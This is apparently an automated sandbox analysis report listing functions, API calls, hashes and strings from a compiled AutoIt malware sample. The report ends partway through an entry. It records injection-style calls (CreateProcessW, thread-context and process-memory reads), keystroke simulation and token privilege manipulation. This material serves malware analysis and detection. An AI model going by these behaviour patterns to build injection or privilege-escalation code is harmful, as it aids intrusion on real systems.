Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 3b320996271aba608899f7fd836aa600b1a19b5dc37225b7235000b2dce320f3
Instruction ID: 8b033e751cb9e1bd7fbda63f5a26fe2190a23b300936675f6bb7913628bd05b5
Opcode Fuzzy Hash: 3b320996271aba608899f7fd836aa600b1a19b5dc37225b7235000b2dce320f3
Instruction Fuzzy Hash: 1AF09631802A249ADB11FBA5BC017AD76E16F41BB5F209148E424AB1C1CBBC8D42BB52

Function 01946C35 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 019473F3
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01947489
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 019474AB

Memory Dump Source

Source File: 00000000.00000002.2111882744.0000000001945000.00000040.00000020.00020000.00000000.sdmp, Offset: 01945000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1945000_EIvidclKOb.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
Instruction ID: 2e52755bc3f26311f6ab1f240648481c09a96fb5be63684de36a326a1c2699b5
Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
Instruction Fuzzy Hash: AC12DD24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A

Function 00F20C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00F20CB7

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 2c62f44e0cf66a9c5460809dee7a091e96cc6fcfad3c882409ff20bd2d801df2
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 7F3106B2A401159FC718DF08E494A69F7A6FF49310B2487A5E80ADB352DB31EDC1EBC0

Function 00F3FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00F3FCB7

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: d2e38fc196c51f2c31b130e3d069cf605e14a43053fc6c024ecb21172fcd5586
Instruction ID: 7bcb9fb93681dabe668494c780d0ac8643167bd6efecb061e1e3c6364d6dd7ef
Opcode Fuzzy Hash: d2e38fc196c51f2c31b130e3d069cf605e14a43053fc6c024ecb21172fcd5586
Instruction Fuzzy Hash: 93411A749083519FDB14DF14C848B1ABBE0BF45324F0988ACE8998B3A2C735EC49EF52

Function 00F07B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00F07BB3

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 1e9d89367746fc8bb822d7a74f83982bea5b764f888cb37eea307d3cd4e9cd3e
Instruction ID: 50670d61ab1dc89c6ea3723bcc4e7d66f7b2d6a90a7cc4bf7c7def851d2bde7f
Opcode Fuzzy Hash: 1e9d89367746fc8bb822d7a74f83982bea5b764f888cb37eea307d3cd4e9cd3e
Instruction Fuzzy Hash: D72124B2A04A19EBDB109F11EC817AE7BB4FF543A0F218569E886C51D0EB30D0D0FB01

Function 00F04DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F04BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00F04BEF

Part of subcall function 00F2525B: __wfsopen.LIBCMT ref: 00F25266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00FC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F04E0F

Part of subcall function 00F04B6A: FreeLibrary.KERNEL32(00000000), ref: 00F04BA4

Part of subcall function 00F04C70: _memmove.LIBCMT ref: 00F04CBA

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 5cb1c228b82d8aff7417e465e500221cb0942a9de846d2304fddad4205a02010
Instruction ID: 72b0e6ceb8bf97d6e048443c4206e0a604c0f20db273a1a915cb1193239ec799
Opcode Fuzzy Hash: 5cb1c228b82d8aff7417e465e500221cb0942a9de846d2304fddad4205a02010
Instruction Fuzzy Hash: DC11A772640206ABCF15FF70DC16FAD77A9AF84710F108429F641A71C1DA79A905BB51

Function 00F3FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00F3FD91

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: e25d99bca6c17ff7cdbd0f9df54ade0b4d2b4e5d8ebfe45c8f24f18780626e28
Instruction ID: da825f75f8cc83babd2f4590bc646a25fc536e35e8e10dbf340ed4b36bfa710c
Opcode Fuzzy Hash: e25d99bca6c17ff7cdbd0f9df54ade0b4d2b4e5d8ebfe45c8f24f18780626e28
Instruction Fuzzy Hash: 242155B5908302DFDB14DF24C844B1ABBE1BF88314F05886CF88A57762D731E849EB92

Function 00F24863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00F248A6

Part of subcall function 00F28B28: __getptd_noexit.LIBCMT ref: 00F28B28

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 861460338fa7dfc3f4cc602bdbf9204fdd6e54c4841cdc9c367784cf15041802
Instruction ID: 928f15041b4a2974406872f4f08648f5441e17a6e301513070f75c9007565003
Opcode Fuzzy Hash: 861460338fa7dfc3f4cc602bdbf9204fdd6e54c4841cdc9c367784cf15041802
Instruction Fuzzy Hash: EBF0FF31812228EBDF11AFB0AC063EE36A0AF01332F008404F4209A281DBBC9952FB51

Function 00F04E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00FC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F04E7E

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: bf1ef724a866efd1ef11a3dbfecd525c3754ced29cd3348cba21e5d75ae04b33
Instruction ID: 3f5b2fd1154fc591af9a3ad8dede613ab2b28a6c155b9dcc1f867f1f67b994e9
Opcode Fuzzy Hash: bf1ef724a866efd1ef11a3dbfecd525c3754ced29cd3348cba21e5d75ae04b33
Instruction Fuzzy Hash: D1F039B1901B11CFCB349F64E894822BBE1BF143793208A3EE2D682660C732A844FF40

Function 00F20791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00F207B0

Part of subcall function 00F07BCC: _memmove.LIBCMT ref: 00F07C06

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 9002fc48d66f1ff3ea0000e559c7b76aba09d1ac85b64f8c33d55338c28963f1
Instruction ID: 729983c27212ee2ed534db5b4ee3c8a6d96afb8a2d48379c7601c03c337d028a
Opcode Fuzzy Hash: 9002fc48d66f1ff3ea0000e559c7b76aba09d1ac85b64f8c33d55338c28963f1
Instruction Fuzzy Hash: EAE086769052285BC720E6589C05FEA779DDBC87A0F0541B5FC0CD7248D964AC909690

Function 00F2525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00F25266

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 97d565c7ef1e8792dc02a18d7e9de015dbffe2950c534798b09a37d1396e4138
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 08B0927644020CB7CE012A82FC02A593B199B42B64F408020FB0C181A2A677A664AA8A

Function 01947C38 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01947C49

Memory Dump Source

Source File: 00000000.00000002.2111882744.0000000001945000.00000040.00000020.00020000.00000000.sdmp, Offset: 01945000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1945000_EIvidclKOb.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: ffb09c9c06bf9ce54ec9dbf6c552d95239ec9764861625a04621f4e0c3c9291a
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 75E0BF7494020E9FDB00DFA4D64969D7BB4EF04302F1001A1FD0592280D6309A508A62

Non-executed Functions

Function 00F8CABC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00F8CB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F8CB95
GetWindowLongW.USER32(?,000000F0), ref: 00F8CBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F8CC00
SendMessageW.USER32 ref: 00F8CC29
_wcsncpy.LIBCMT ref: 00F8CC95
GetKeyState.USER32(00000011), ref: 00F8CCB6
GetKeyState.USER32(00000009), ref: 00F8CCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F8CCD9
GetKeyState.USER32(00000010), ref: 00F8CCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F8CD0C
SendMessageW.USER32 ref: 00F8CD33
SendMessageW.USER32(?,00001030,?,00F8B348), ref: 00F8CE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00F8CE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00F8CE60
SetCapture.USER32(?), ref: 00F8CE69
ClientToScreen.USER32(?,?), ref: 00F8CECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00F8CEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F8CEF5
ReleaseCapture.USER32 ref: 00F8CF00
GetCursorPos.USER32(?), ref: 00F8CF3A
ScreenToClient.USER32(?,?), ref: 00F8CF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 00F8CFA3
SendMessageW.USER32 ref: 00F8CFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 00F8D00E
SendMessageW.USER32 ref: 00F8D03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00F8D05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00F8D06D
GetCursorPos.USER32(?), ref: 00F8D08D
ScreenToClient.USER32(?,?), ref: 00F8D09A
GetParent.USER32(?), ref: 00F8D0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 00F8D123
SendMessageW.USER32 ref: 00F8D154
ClientToScreen.USER32(?,?), ref: 00F8D1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00F8D1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 00F8D20C
SendMessageW.USER32 ref: 00F8D22F
ClientToScreen.USER32(?,?), ref: 00F8D281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00F8D2B5

Part of subcall function 00F025DB: GetWindowLongW.USER32(?,000000EB), ref: 00F025EC

GetWindowLongW.USER32(?,000000F0), ref: 00F8D351

Strings

@GUI_DRAGID, xrefs: 00F8CE9C
F, xrefs: 00F8D235

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: af1363867a2d2efbf4da439ff23863a00210662567c19e607d1c756abd045b96
Instruction ID: a269d910bf1651ffb8dd8e2661e2de696cd1417751065e319118e5410f3ff585
Opcode Fuzzy Hash: af1363867a2d2efbf4da439ff23863a00210662567c19e607d1c756abd045b96
Instruction Fuzzy Hash: 6842AC74604645AFD720EF24CC49FAABBE5FF89720F140619F599872A1C731E844FBA2

Function 00F16F9E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00F171C3
_memset.LIBCMT ref: 00F17539
_memmove.LIBCMT ref: 00F176AC

Strings

\b(?=\w), xrefs: 00F53769
\b(?<=\w), xrefs: 00F53773
[:>:]], xrefs: 00F17492
Q\E, xrefs: 00F17FCB
[:<:]], xrefs: 00F17479
DEFINE, xrefs: 00F52103

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: _memmove$_memset
String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-1798697756
Opcode ID: 9b23e4adcaca369b77e7113ccb89ed6ec7221d52ddbfefc2f98cda53d5a2b1b5
Instruction ID: aa85a298dd8a7640ab5bbe1a5bf1a7a6eb6b73d73b7856d019dcf054551e0e44
Opcode Fuzzy Hash: 9b23e4adcaca369b77e7113ccb89ed6ec7221d52ddbfefc2f98cda53d5a2b1b5
Instruction Fuzzy Hash: 8D93B471E04219DBDB24CF58C8817EDB7B1FF48321F25816AEE49AB281E7749D85EB40

Function 00F048D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00F048DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F3D665
IsIconic.USER32(?), ref: 00F3D66E
ShowWindow.USER32(?,00000009), ref: 00F3D67B
SetForegroundWindow.USER32(?), ref: 00F3D685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F3D69B
GetCurrentThreadId.KERNEL32 ref: 00F3D6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 00F3D6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 00F3D6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 00F3D6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 00F3D6CF
SetForegroundWindow.USER32(?), ref: 00F3D6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 00F3D6E7
keybd_event.USER32(00000012,00000000), ref: 00F3D6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 00F3D6FC
keybd_event.USER32(00000012,00000000), ref: 00F3D701
MapVirtualKeyW.USER32(00000012,00000000), ref: 00F3D70A
keybd_event.USER32(00000012,00000000), ref: 00F3D70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 00F3D719
keybd_event.USER32(00000012,00000000), ref: 00F3D71E
SetForegroundWindow.USER32(?), ref: 00F3D721
AttachThreadInput.USER32(?,?,00000000), ref: 00F3D748

Strings

Shell_TrayWnd, xrefs: 00F3D660

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: b36816bce2ebc51f05c7208da43ef2400cbbfac4d29c4241ad52b038270bd08e
Instruction ID: 9f90ecc0794d237abc8b2800d2bb4689ba6d4ecee18eb1c4dd15e9fcd2ca2856
Opcode Fuzzy Hash: b36816bce2ebc51f05c7208da43ef2400cbbfac4d29c4241ad52b038270bd08e
Instruction Fuzzy Hash: 0A315271A4031CBFEB206B619C4AFBF7E6CEB44B60F144025FA05EA1D1D6B05951BBA1

Function 00F58310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00F587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F5882B
Part of subcall function 00F587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F58858
Part of subcall function 00F587E1: GetLastError.KERNEL32 ref: 00F58865

_memset.LIBCMT ref: 00F58353
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00F583A5
CloseHandle.KERNEL32(?), ref: 00F583B6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00F583CD
GetProcessWindowStation.USER32 ref: 00F583E6
SetProcessWindowStation.USER32(00000000), ref: 00F583F0
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00F5840A

Part of subcall function 00F581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F58309), ref: 00F581E0
Part of subcall function 00F581CB: CloseHandle.KERNEL32(?,?,00F58309), ref: 00F581F2

Strings

, xrefs: 00F58362
default, xrefs: 00F58405
winsta0, xrefs: 00F583C8

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 6a5c3a0bd3b74088979066c6d929b6be91b6f22c11e16583652db8432fea62c8
Instruction ID: d23c774631696c59548eecac73ba5f7c61d6c0c1ff4c48113785fae070dd7f37
Opcode Fuzzy Hash: 6a5c3a0bd3b74088979066c6d929b6be91b6f22c11e16583652db8432fea62c8
Instruction Fuzzy Hash: CB814C71D00209AFDF119FA4DC45AEE7B78EF04365F184169FE14B6161EB358A1AEB20

Function 00F6C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00F6C78D
FindClose.KERNEL32(00000000), ref: 00F6C7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F6C806
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F6C81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 00F6C844
__swprintf.LIBCMT ref: 00F6C890
__swprintf.LIBCMT ref: 00F6C8D3

Part of subcall function 00F07DE1: _memmove.LIBCMT ref: 00F07E22

__swprintf.LIBCMT ref: 00F6C927

Part of subcall function 00F23698: __woutput_l.LIBCMT ref: 00F236F1

__swprintf.LIBCMT ref: 00F6C975

Part of subcall function 00F23698: __flsbuf.LIBCMT ref: 00F23713
Part of subcall function 00F23698: __flsbuf.LIBCMT ref: 00F2372B

__swprintf.LIBCMT ref: 00F6C9C4
__swprintf.LIBCMT ref: 00F6CA13
__swprintf.LIBCMT ref: 00F6CA62

Strings

%02d, xrefs: 00F6C91B, 00F6C925, 00F6C973, 00F6C9C2, 00F6CA11, 00F6CA60
%4d, xrefs: 00F6C8CD
%4d%02d%02d%02d%02d%02d, xrefs: 00F6C88A

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
